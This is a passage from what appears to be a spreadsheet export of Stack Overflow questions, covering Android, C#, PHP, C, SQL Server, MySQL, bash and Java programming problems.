&lt;p&gt;I want to take a picture from the surface preview of the camera, and save it to the sd_card. This works ALMOST perfectly. I assign it a file name, and for one reason or another, it does not use the filename. &lt;/p&gt;
&lt;p&gt;This is what I have been trying to do :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    Button imagecapture = (Button)findViewById(R.id.imagecapture);
	imagecapture.setOnClickListener(new View.OnClickListener() {
        public void onClick(View view) {
        	String filename = null;
        	ImageCaptureCallback iccb = null;
        		try {
        		filename = timeStampFormat.format(new Date());
        		ContentValues values = new ContentValues();
        		values.put(Media.TITLE, filename);
        		values.put(Media.DESCRIPTION, "Image capture by camera");
        		Uri uri = getContentResolver().insert(Media.EXTERNAL_CONTENT_URI, values);
        		iccb = new ImageCaptureCallback( getContentResolver().openOutputStream(uri));
        		} catch(Exception ex ){
        		ex.printStackTrace();
        		Log.e(getClass().getSimpleName(), ex.getMessage(), ex);
        		}
        	camera.takePicture(mShutterCallback, mPictureCallbackRaw, iccb);
        	com.froogloid.android.gspot.Park.imageFileName = filename;
        }
    });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It won't use the filename (i.e. time/date stamp I ask it to.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to determine using reflection the generic parameter of the base class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following structure&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyClass : MyBaseClass&amp;lt;System.Int32&amp;gt;
{
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In a static method and without instantiating a new MyClass instance how do I get the type of the generic parameter used to build the concrete base class? e.g in the above example System.Int32&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the function __construct used for?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been noticing &lt;code&gt;__construct&lt;/code&gt; a lot with classes. I did a little reading and surfing the web, but I couldn't find an explanation I could understand. I am just beginning with OOP.&lt;/p&gt;
&lt;p&gt;I was wondering if someone could give me a general idea of what it is, and then a simple example of how it is used with PHP?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>dynamic allocating array of arrays in C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't truly understand some basic things in C like dynamically allocating array of arrays.
I know you can do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int **m;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in order to declare a 2 dimensional array (which subsequently would be allocated using some *alloc function). Also it can be "easily" accessed by doing &lt;code&gt;*(*(m + line) + column)&lt;/code&gt;. But how should I assign a value to an element from that array? Using gcc the following statement &lt;code&gt;m[line][column] = 12;&lt;/code&gt; fails with a segmentation fault.&lt;/p&gt;
&lt;p&gt;Any article/docs will be appreciated. :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# App.Config location</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a solution with 10 or so projects in it, and have started having issues with SystemConfiguration returning empty configuration instead of locating my App.Config file.&lt;/p&gt;
&lt;p&gt;Should I have multiple App.Configs, one for each project (I am assuming and hoping not), if not, where is the best place for it to be located in my projects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Usage history of Stored Procedures in SQL Server 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work with legacy systems that have tens of thousand of lines of stored procedure code, where many of the stored procedures are obsolete and not used anymore. There doesn't seem to be a way to check execution history, so my question is if it might be a good idea to start each stored procedure by inserting a row into a table that keeps records of the execution?&lt;/p&gt;
&lt;p&gt;could be very simple like:&lt;/p&gt;
&lt;p&gt;insert into
    executionHistory (
        name,
        date
    )
    select
        'spName',
        getdate()&lt;/p&gt;
&lt;p&gt;-- then rest of procedure&lt;/p&gt;
&lt;p&gt;I imagine this could be very useful for doing cleanups of old unused code, and might also be handy when trying to decide where to optimize. I mean it's better to shave 10 seconds off execution time on a procedure that is executed 50 times a day, than saving 10 minutes execution time on a procedure that is only used once a year.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SCons problem - dont understand Variables class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an SConstruct build file for a project and I'm trying to update from Options to Variables, since Options is being deprecated. I don't understand how to use Variables though. I have 0 python experience which is probably contributing to this.&lt;/p&gt;
&lt;p&gt;For example, I have this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;opts = Variables()
opts.Add('fcgi',0)
print opts['fcgi']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I get an error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AttributeError: Variables instance has no attribute '__getitem__':
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Not sure how this is supposed to work&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does asp.net remove &lt;script&gt; tags in repeaters and inside the &lt;% for loop %&gt; in mvc</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some &lt;code&gt;&amp;lt;script type="javascript"/script&lt;/code&gt; tags inside both a repeater and a for loop in mvc. &lt;/p&gt;
&lt;p&gt;On page render the script is gone and is not displayed both inside the repeater and the for loop (they are separate). &lt;/p&gt;
&lt;p&gt;Is there some option I need to set to stop this from happening? Has anyone had this happen to them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there compelling reasons not to use Groovy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing a LoB application in Java after a long absence from the platform (having spent the last 8 years or so entrenched in Fortran, C, a smidgin of C++ and latterly .Net).&lt;/p&gt;
&lt;p&gt;Java, the language, is not much changed from how I remember it. I like it's strengths and I can work around its weaknesses - the platform has grown and deciding upon the myriad of different frameworks which appear to do much the same thing as one another is a different story; but that can wait for another day - all-in-all I'm comfortable with Java. However, over the last couple of weeks I've become enamoured with Groovy, and purely from a selfish point of view: but not just because it makes development against the JVM a more succinct and entertaining (and, well, "groovy") proposition than Java (the language).&lt;/p&gt;
&lt;p&gt;What strikes me most about Groovy is its inherent maintainability. We all (I hope!) strive to write well documented, easy to understand code. However, sometimes the languages we use themselves defeat us. An example: in 2001 I wrote a library in C to translate EDIFACT EDI messages into ANSI X12 messages. This is not a particularly complicated process, if slightly involved, and I thought at the time I had documented the code properly - and I probably had - but some six years later when I revisited the project (and after becoming acclimatised to C#) I found myself lost in so much C boilerplate (mallocs, pointers, etc. etc.) that it took three days of thoughtful analysis before I finally understood what I'd been doing six years previously.&lt;/p&gt;
&lt;p&gt;This evening I've written about 2000 lines of Java (it is the day of rest, after all!). I've documented as best as I know how, but, but, of those 2000 lines of Java a significant proportion is Java boiler plate.&lt;/p&gt;
&lt;p&gt;This is where I see Groovy and other dynamic languages winning through - maintainability and later comprehension. Groovy lets you concentrate on your intent without getting bogged down on the platform specific implementation; it's almost, but not quite, self documenting. I see this as being a huge boon to me when I revisit my current project (which I'll port to Groovy asap) in several years time and to my successors who will inherit it and carry on the good work.&lt;/p&gt;
&lt;p&gt;So, are there any reasons not to use Groovy? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Debugging ASP.NET Session State server issues</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an application that runs over load balanced server instances, and therefore is configured to use the ASP.NET session state service, which is running on one of our DB servers. While both instances of our app can successfully connect to the state server, changes in session state data are not being reflected across both of them. FI, If I call &lt;code&gt;Session.Add('SomeKey', SomeData)&lt;/code&gt; on Server A, this is not being reflected if I then try to access &lt;code&gt;Session['SomeKey']&lt;/code&gt; on Server B. &lt;/p&gt;
&lt;p&gt;Session.SessionID returns the same value on both servers, and I have checked that they are both using the same validationkey and decryptionkey values configured in the machinekey section of machine.config. I even tried specifying these values in the apps web.config.&lt;/p&gt;
&lt;p&gt;What other things should I be looking out for which may be causing these symptoms, and what steps can people recommend to help debug this issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommended website resolution (width and height)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any standard on common website resolution?&lt;/p&gt;
&lt;p&gt;We are targeting newer monitors, perhaps at least 1280px wide, but the height may varies, and each browser may have different toolbar heights too.&lt;/p&gt;
&lt;p&gt;Is there any sort of standard to this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Destructors of builtin types (int, char etc..)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In C++ the following code gives a compiler error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void destruct1 (int * item)
{
  item-&amp;gt;~int();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code is nearly the same, I just typedef the int to another type and something magic happens:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef int myint;
void destruct2 (myint * item)
{
  item-&amp;gt;~myint();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why does the second code works? Does an int gets a destructor just because it has been typedefed?&lt;/p&gt;
&lt;p&gt;In case you wonder why one ever would like to do this: This comes from refactoring C++ code. We're removing the standard heap and replacing it with selfmade pools. This requires us to call placement-new and the destructors. I know that calling destructors for primitive types is useless, but we want them in the code nevertheless in case we later replace PODs with real classes.&lt;/p&gt;
&lt;p&gt;Finding out that naked int's don't work but typedefed ones do was quite a surprise.&lt;/p&gt;
&lt;p&gt;Btw - I have a solution that involves template-functions. We just typedef inside the template and everything is fine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Software visualization for C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does any of you know a tool for software visualization, or visual code navigation in c#?&lt;/p&gt;
&lt;p&gt;I found a bunch of tools but they're all for Java for some reason.&lt;/p&gt;
&lt;p&gt;There's a list of them in wikipedia but none is for the .Net platform.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Software_visualization#Tools" rel="nofollow"&gt;http://en.wikipedia.org/wiki/Software_visualization#Tools&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I'm very much interested in visual code navigation because I get very disoriented around big projects.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Synchronize two databases schema in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was looking for a portable script or command line program that can synchronize two MySQL databases schema. I am not looking for a GUI based solution because that can't be automated or run with the buid/deployment tool.&lt;/p&gt;
&lt;p&gt;Basically what it should do is scan database1 and database2. Check the schema difference (tables and indexes) and propose a bunch of SQL statements to run on one so that it gets the similiar structure of the other minimizing data damage as much as possible.&lt;/p&gt;
&lt;p&gt;If someone can indicate a PHP, Python or Ruby package where this type of solution is implemented, I can try to copy the code from there.&lt;/p&gt;
&lt;p&gt;A lot of MySQL GUI tools probably can do this, but I am looking for a scriptable solution.&lt;/p&gt;
&lt;p&gt;Edit: Sorry for not being more clear: What I am looking for is synchronization in table structure while keeping data intact as far as possible. Not data replication.&lt;/p&gt;
&lt;p&gt;More info:&lt;/p&gt;
&lt;p&gt;Why replication won't work.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The installation bases are spread around the state.&lt;/li&gt;
&lt;li&gt;We want the installer to perform dynamic fixes on the DB based on chagnes made in the latest version, regardless of what older version the end user might be using.&lt;/li&gt;
&lt;li&gt;Changes are mostly like adding new column to a tables, creating new indexes, or dropping indexes, adding tables or dropping tables used by the system internally (we don't drop user data table).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If it's a GUI: No it can't be used. We don't want to bunddle a 20MB app with our installer just for DB diff. Specially when the original installer is less than 1 MB.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Queries - How Slow is Too Slow?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you have any formal or informal standards for reasonably achievable SQL query speed? How do you enforce them? Assume a production OLTP database under full realistic production load of a couple dozen queries per second, properly equipped and configured.&lt;/p&gt;
&lt;p&gt;Personal example for illustrative purposes (not a recommendation, highly contingent on many factors, some outside your control):&lt;/p&gt;
&lt;p&gt;Expectation:&lt;/p&gt;
&lt;p&gt;Each transactional unit (single statement, multiple SQL statements from beginning to end transaction boundaries, or a single stored procedure, whichever is largest) must execute in 1 second or less on average, without anomalous outliers.&lt;/p&gt;
&lt;p&gt;Resolution:&lt;/p&gt;
&lt;p&gt;Slower queries must be optimized to standard. Slow queries for reports and other analysis are moved to an OLAP cube (best case) or a static snapshot database.&lt;/p&gt;
&lt;p&gt;(Obviously some execution queries (Insert/Update/Delete) can't be moved, so must be optimized, but so far in my experience it's been achievable.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Migrate from Subversion to Team Foundation Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are looking for any proven migration path for moving a Subversion repository to a Team Foundation Server. Seems that there has been a discontinued product named CS-Converter(&lt;a href="http://www.componentsoftware.com/Products/converter/svn2tfs.htm" rel="nofollow"&gt;ComponentSoftware homepage&lt;/a&gt;) but can't find anybody having used it. &lt;/p&gt;
&lt;p&gt;Is CS-Converter a solid product, are there any other resources I haven't found or does anybody have some personal experience which can guide us?&lt;/p&gt;
&lt;p&gt;UPDATE: Just to clarify, we need to actually move the existing repository from Subversion to Team Foundation Server (orders from up high), so while SVNBridge is nice, it just does do the job. We need a proven, safe way to migrate the repository&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How lean do my C++ exception classes really need to be?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are lots of places where guidelines for designing exception classes can be found. Almost everywhere I look, there's this list of things exception objects should never do, which impacts the design of those classes.&lt;/p&gt;
&lt;p&gt;For instance, the &lt;a href="http://www.boost.org/community/error_handling.html"&gt;Boost people recommend&lt;/a&gt; that the class contain no &lt;code&gt;std::string&lt;/code&gt; members, because their constructor could throw, which would cause the run-time to terminate the program immediately.&lt;/p&gt;
&lt;p&gt;Now, it seems to me that this is rather theoretical. If &lt;code&gt;std::string&lt;/code&gt;'s constructor throws, it's either a bug (I passed a null-pointer in) or an out-of-memory condition (correct me if I'm wrong here). Since I'm on a desktop, I just pretend I have an infinite amount of memory, and &lt;strong&gt;running out of memory is fatal to my application no matter what&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;With that in mind, why shouldn't I embed &lt;code&gt;std::string&lt;/code&gt; objects in my exception classes? In fact, why couldn't my exception classes be full-featured, and also take care of logging, stack tracing, etc. I'm aware of the one-responsibility principle, and it seems to me to be a fair trade-off to have the exception class do all that. Surely, if my parser needs to report a syntax error, an full-featured exception would be more helpful than an exception built around a statically allocated character array.&lt;/p&gt;
&lt;p&gt;So: lean C++ exception classes - how big a deal is it in the real-world? What are the trade-offs? Are there good discussions on the topic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Condition evaluation in loops?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;string strLine;//not constant
int index = 0;
while(index &amp;lt; strLine.length()){//strLine is not modified};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;how many times &lt;code&gt;strLine.length()&lt;/code&gt; is evaluated&lt;/p&gt;
&lt;p&gt;do we need to put use &lt;code&gt;nLength&lt;/code&gt; with &lt;code&gt;nLength&lt;/code&gt; assigned to &lt;code&gt;strLine.length()&lt;/code&gt; just before loop &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to display text in system tray icon with win32 API?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Trying to create a small monitor application that displays current internet usage as percentage in system tray in C using win32 API. &lt;/p&gt;
&lt;p&gt;Also wanting to use colour background or colour text based on how much is used relative to days left in month.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; To clarify I am wanting the system tray icon to be dynamic. As the percentage changes I update the system tray icon. Looking for solution that uses just plain old win32 (ie. No MFC or WTL).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Changing tables from MyISAM to InnoDB make the system slow</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi I am using Mysql 5.0.x&lt;/p&gt;
&lt;p&gt;I have just changed a lot of the tables from MyISAM to InnoDB  &lt;/p&gt;
&lt;p&gt;With the MyISAM tables it took about &lt;strong&gt;1 minute&lt;/strong&gt; to install our database
With the InnoDB it takes about &lt;strong&gt;15 minute&lt;/strong&gt; to install the same database&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why does the InnoDB take so long?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What can I do to speed things up?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The Database install does the following steps &lt;/p&gt;
&lt;p&gt;1)  Drops the schema&lt;/p&gt;
&lt;p&gt;2)  Create the schema&lt;/p&gt;
&lt;p&gt;3)  Create tables&lt;/p&gt;
&lt;p&gt;4)  Create stored procedures&lt;/p&gt;
&lt;p&gt;5)  Insert default data &lt;/p&gt;
&lt;p&gt;6)  Insert data via stored procedure&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;The Inserting of default data takes most of the time&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I disable tabs for &lt;a&gt; tag</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using  tags for links on a web page. How do I disable tab key from selecting either of them. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between $(...) and `...`</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The question is as simple as stated in the title: What's the difference between the following two expressions?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(...)
`...`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For example, are the two variables &lt;code&gt;test1&lt;/code&gt; and &lt;code&gt;test2&lt;/code&gt; different?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;test1=$(ls)
test2=`ls`
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>The Most Efficient Algorithm to Find First Prefix-Match From a Sorted String Array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Input:&lt;/p&gt;
&lt;p&gt;1) A huge sorted array of string SA;&lt;/p&gt;
&lt;p&gt;2) A prefix string P;&lt;/p&gt;
&lt;p&gt;Output:&lt;/p&gt;
&lt;p&gt;The index of the first string matching the input prefix if any.
If there is no such match, then output will be -1.&lt;/p&gt;
&lt;p&gt;Example:
SA = {"ab", "abd", "abdf", "abz"}
P = "abd"
The output should be 1 (index starting from 0).&lt;/p&gt;
&lt;p&gt;What's the most algorithm way to do this kind of job?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Symfony Propel criteria</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any possible way to convert the MySQL object into criteria object? I tried this query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select 
  p.disrepid, 
  p.subject, p.body, 
  c.disrepid as disrepid1, 
  c.subject as subject1, 
  c.body as body1 
from discusreply as p, discusreply as c 
where p.distopid=' . $this-&amp;gt;id . ' 
  and (c.disrepid = p.parentid or c.parentid = p.distopid) 
order by p.disrepid ASC
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried a lot for converting this query into a &lt;code&gt;Criteria&lt;/code&gt;, But nothing happened. I want this criteria object for passing this into Pager class for completing the pagination.
&lt;code&gt;$pager-&amp;gt;setCriteria($c);&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Syntax Prob: Using Variables in Stored Procedures</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone tell how correct the following code below. Iam tryin to create a stored procedure that returns the rowcount of a table whose name is passed to it.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE PROCEDURE spROWCOUNTER
(
    @tablename nvarchar(20)
    @rowCountVal int OUTPUT
)
AS
DECLARE @strQuery nvarchar(300)
SET @strQuery = 'SELECT @rowCountVal=COUNT(*) FROM '+@tablename
EXEC(@strQuery)
RETURN @rowCountVal
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ERROR MESSAGE : &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Incorrect syntax near '@rowCountVal' &lt;/li&gt;
&lt;li&gt;Must declare scalar variable '@tablename' &lt;/li&gt;
&lt;li&gt;Must declare scalar variable '@rowCountVal'&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;whereas the code below works fine&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER PROCEDURE spROWCOUNTER
(
    @rowCountVal int OUTPUT
)
AS
SELECT @rowCountVal=COUNT(*) FROM DEFECT_LOG
RETURN @rowCountVal
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C# How can I hide the cursor in a winforms app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im developing a touchscreen app and I need to hide the cursor whenever it is within the main Form. &lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#: How to convert BITMAP byte array to JPEG format?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I convert a BITMAP in byte array format to JPEG format using .net 2.0?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MovieClipLoader fails (has something to do with cache)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a small flash file that just loads and shows one image scaled to fit inside the content area. We use these with a javascript gallery so we have several instances on one html page (embedded with swfObject) I've been using MovieClipLoader to load the jpgs but it no longer works. &lt;/p&gt;
&lt;p&gt;We updated the server and as far as I know only relevant thing that has changed is cache related. Previously all images and swfs were always reloaded. Now they should be loaded from cache.&lt;/p&gt;
&lt;p&gt;I can see from firebug that the swf is actually loading the jpg it just doesn't display anything. This happens on many browser/os/flash plugin combinations. Sometimes some of the images show, sometimes none. &lt;/p&gt;
&lt;p&gt;The code inside moviecliploader event handlers (onloadinit, onloaderror) is never run. &lt;/p&gt;
&lt;p&gt;Any ideas on how to get this working would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Async Method Call</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I call a method asynchronously ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to generate a hash value in J2ME?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I generate hash value for a byte array, in J2ME?&lt;/p&gt;
&lt;p&gt;It doesn't have to be very very secure but it should be fast.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Is holding data in a delimited string bad practice</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it bad practice to have a string like 
"name=Gina;postion= HouseMatriarch;id=1234" to hold state data in an application.I know that I could just as well have a struct , class or hashtable to hold this info.  &lt;/p&gt;
&lt;p&gt;Is it acceptable practice to hold delimited key/value pairs in a database fieldâ€“ just for use in where the data type is not known at design time.  &lt;/p&gt;
&lt;p&gt;Thanks...I am just trying to insure that I maintain good design practices&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good example problems to solve with threading</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have used threads one or two times to try and boost the performance of my code, with varying degrees of success. It is obvious that I need some more experience working with multi thread code. Are there any good programming problems to solve which will help to get a grip on using multiple threads to improve performance?&lt;/p&gt;
&lt;p&gt;It would be nice if it is a known/well explored problem so that after I have botched a couple of attempts I can read some literature on how it should be done. &lt;/p&gt;
&lt;p&gt;-- edit&lt;/p&gt;
&lt;p&gt;I am interested in using parallelism to speed up applications in general, as I have heard/read a lot recently about processors increasing power through parallelism rather than speed. I know vaguely of barbers/philosophers but was looking for something a little more practical, to gain hands on experience. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to throttle login attemps in Java webapp?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to implement an efficient mechanism to throttle login attemps in my Java web application, to prevent brute-force attacks on user accounts.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.codinghorror.com/blog/archives/001206.html" rel="nofollow"&gt;Jeff explained the why, but not the how.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Simon Willison showed an &lt;a href="http://simonwillison.net/2009/Jan/7/ratelimitcache/" rel="nofollow"&gt;implementation in Python for Django&lt;/a&gt;: 
That doesn't really help me along as I can't use memcached nor Django.&lt;/p&gt;
&lt;p&gt;Porting his ideas from scratch doesn't seem like a great either - I don't want to reinvent the wheel.&lt;/p&gt;
&lt;p&gt;I found one &lt;a href="https://svn.igniterealtime.org/svn/repos/openfire/tags/openfire_3_6_0a/src/java/org/jivesoftware/admin/LoginLimitManager.java" rel="nofollow"&gt;Java implementation&lt;/a&gt;, though it seems rather naiive: Instead of a LRU cache, it just clears all entries after 15 minutes.&lt;/p&gt;
&lt;p&gt;EHCache could be an alternative for memcached, but I don't have any experience with it and don't really want to intoduce yet another technology if there are better alternatives for this task.&lt;/p&gt;
&lt;p&gt;So, whats a good way to implement login throttling in Java?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which character set to choose when compiling a c++ dll</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could someone give some info regarding the different character sets within visual studio's project properties sheets.&lt;/p&gt;
&lt;p&gt;The options are:&lt;br /&gt;
None&lt;br /&gt;
Unicode&lt;br /&gt;
Multi byte&lt;/p&gt;
&lt;p&gt;I would like to make an informed decision as to which to choose.&lt;br /&gt;
Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Organization of many forms on many pages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web app I'm building that has about 50 forms.&lt;/p&gt;
&lt;p&gt;I have a very nice form-building class that handles the creation and submission of these forms very nicely and it's wrapped with error handlers, etc.  No help needed there.&lt;/p&gt;
&lt;p&gt;However, the forms are scattered through 120 pages.  I could really use some weigh in from you guys about the ideal organization structure for these pages/forms.  Here are some ideas.  Both have pros and cons.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Each page, in the header, creates the form there detects the presence of a $_POST['action'] variable and processes the forms there.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Each form is built by a function in a form functions file and returns the form object when it's called in the header of the page, and when processing, since $_POST is a superglobal the processing functions is called in the header of the page as well.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;For each page such as profile.php include a file in the header that includes a profile.forms.php in which the method #1 or #2 above happens.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ideas?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Just a note, there will rarely be more than one form per page.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PickupDirectoryFromIis, Sender property and SMTP MAIL FROM envelope</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you send an email using &lt;code&gt;System.Net.Mail&lt;/code&gt; you can set the SMTP MAIL FROM envelope by using the &lt;code&gt;MailMessage.Sender&lt;/code&gt; Property.&lt;/p&gt;
&lt;p&gt;If you set the smtp network &lt;code&gt;deliveryMethod&lt;/code&gt; property to be "Network", the MAIL FROM envelope is set using the Sender value.&lt;/p&gt;
&lt;p&gt;If you set the smtp network &lt;code&gt;deliveryMethod&lt;/code&gt; property to be "PickupDirectoryFromIis", the MAIL FROM envelope uses the &lt;code&gt;MailMessage.From&lt;/code&gt; property instead of the Sender one.&lt;/p&gt;
&lt;p&gt;I need to keep PickupDirectoryFromIis as my &lt;code&gt;deliveryMethod&lt;/code&gt; for performance concern.&lt;/p&gt;
&lt;p&gt;Any suggestion how to keep the value I need for the SMTP MAIL FROM envelope?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to view all services/types registered to StructureMap?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am just trying out structuremap and would like to be able to see which of my classes are registered for which service.&lt;/p&gt;
&lt;p&gt;For example with castle windsor I can bring up the debugger and view container.Kernel.GraphNodes to see a list of all currently registered service/type pairings.&lt;/p&gt;
&lt;p&gt;Is there a similar view into StructureMap internals?  Again, this is only something I intend to use to help familiarize myself with its registry dsl.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Keep HTML tags in XML using LINQ to XML</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an xml file from which I am extracting html using LINQ to XML.  This is a sample of the file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8" ?&amp;gt;
&amp;lt;tips&amp;gt;
    &amp;lt;tip id="0"&amp;gt;
	This is the first tip.
&amp;lt;/tip&amp;gt;
&amp;lt;tip id="1"&amp;gt;
	Use &amp;lt;b&amp;gt;Windows Live Writer&amp;lt;/b&amp;gt; or &amp;lt;b&amp;gt;Microsoft Word 2007&amp;lt;/b&amp;gt; to create and publish content.
&amp;lt;/tip&amp;gt;
&amp;lt;tip id="2"&amp;gt;
	Enter a &amp;lt;b&amp;gt;url&amp;lt;/b&amp;gt; into the box to automatically screenshot and index useful webpages.
&amp;lt;/tip&amp;gt;
&amp;lt;tip id="3"&amp;gt;
	Invite your &amp;lt;b&amp;gt;colleagues&amp;lt;/b&amp;gt; to the site by entering their email addresses.  You can then share the content with them!
&amp;lt;/tip&amp;gt;
&amp;lt;/tips&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using the following query to extract a 'tip' from the file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Tip tip = (from t in tipsXml.Descendants("tip")
				   where t.Attribute("id").Value == nextTipId.ToString()
				   select new Tip()
				   {
				     TipText= t.Value,
					 TipId = nextTipId
				   }).First();
&lt;/code&gt;&lt;/pre&gt;
